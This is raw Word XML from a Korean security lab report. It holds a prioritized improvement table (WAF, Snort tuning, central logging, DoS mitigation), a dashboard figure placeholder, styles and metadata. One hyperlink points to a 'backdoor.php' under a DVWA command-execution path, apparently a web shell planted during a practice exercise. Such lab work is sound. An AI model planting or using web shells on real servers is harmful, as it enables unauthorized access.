        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="964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2720"/>
        <w:gridCol w:w="1928"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="1022"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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현황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개선 방향</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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>
                <w:b/>
              </w:rPr>
              <w:t>우선순위</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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웹</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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SQLi/Command Injection 근본 방어</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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L3/L4 차단 한계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WAF 도입 및 취약 기능 제거/패치</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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상</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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관제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Snort 룰 튜닝 및 오탐 관리</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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시나리오 룰 검증 및 상시 정책 반영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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중</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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운영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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로그 중앙수집/보관</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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(기입)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Syslog/ELK 등 중앙 수집 및 보관 주기 정의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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중</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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가용성</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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DoS 완화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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기본 SYN cookies 의존</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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레이트리밋/상위 장비 ACL/캐시 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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spacing w:after="0" w:line="240"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>중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b/>
        </w:rPr>
        <w:t>그림 5-9. 주정통 점검 결과 대시보드</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="96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3118"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: IMG-5-09</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>점검 결과를 DB 저장 및 웹 가시화한 화면(리스트/상세/필터/엑셀 출력 등) 캡처 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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</w:p>
    <w:sectPr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720" w:footer="72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4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61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1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62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2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4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76092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4061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4061"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="Heading 7 Char"/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f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3f3f3f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 w:val="off"/>
      <w:autoSpaceDN w:val="off"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22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22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4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7f7f7f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480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="6"/>
      <w:numPr>
        <w:numId w:val="248"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="376092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 w:val="off"/>
      <w:autoSpaceDN w:val="off"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75e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75e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54"/>
        <w:ilvl w:val="0"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="376092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56"/>
        <w:ilvl w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22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57"/>
        <w:ilvl w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22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58"/>
        <w:ilvl w:val="4"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="244061"/>
      <w:sz w:val="22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59"/>
        <w:ilvl w:val="5"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="244061"/>
      <w:sz w:val="22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0"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f"/>
      <w:sz w:val="22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1"/>
        <w:ilvl w:val="6"/>
      </w:numPr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2"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f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  <w:style w:type="paragraph" w:styleId="64">
    <w:name w:val="Normal"/>
    <w:uiPriority w:val="6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Arial" w:eastAsia="Arial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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"  /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"  /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"  /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"  /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"  /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"  /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"  /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"  /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"  /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"  /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"  /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"  /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"  /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"  /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"  /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"  /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"  /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"  /><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"  /><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"  /><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"  /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"  /><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"  /><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"  /><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"  /><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"  /><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvwa.wj.com/vulnerabilities/exec/backdoor.php" TargetMode="External" /><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"  /><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"  /><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"  /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"  /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"  /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"  /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"  /><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"  /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.pn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sinu</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-07T05:02:40.021</dcterms:modified>
  <cp:version>0501.0100.01</cp:version>
</cp:coreProperties>
</file>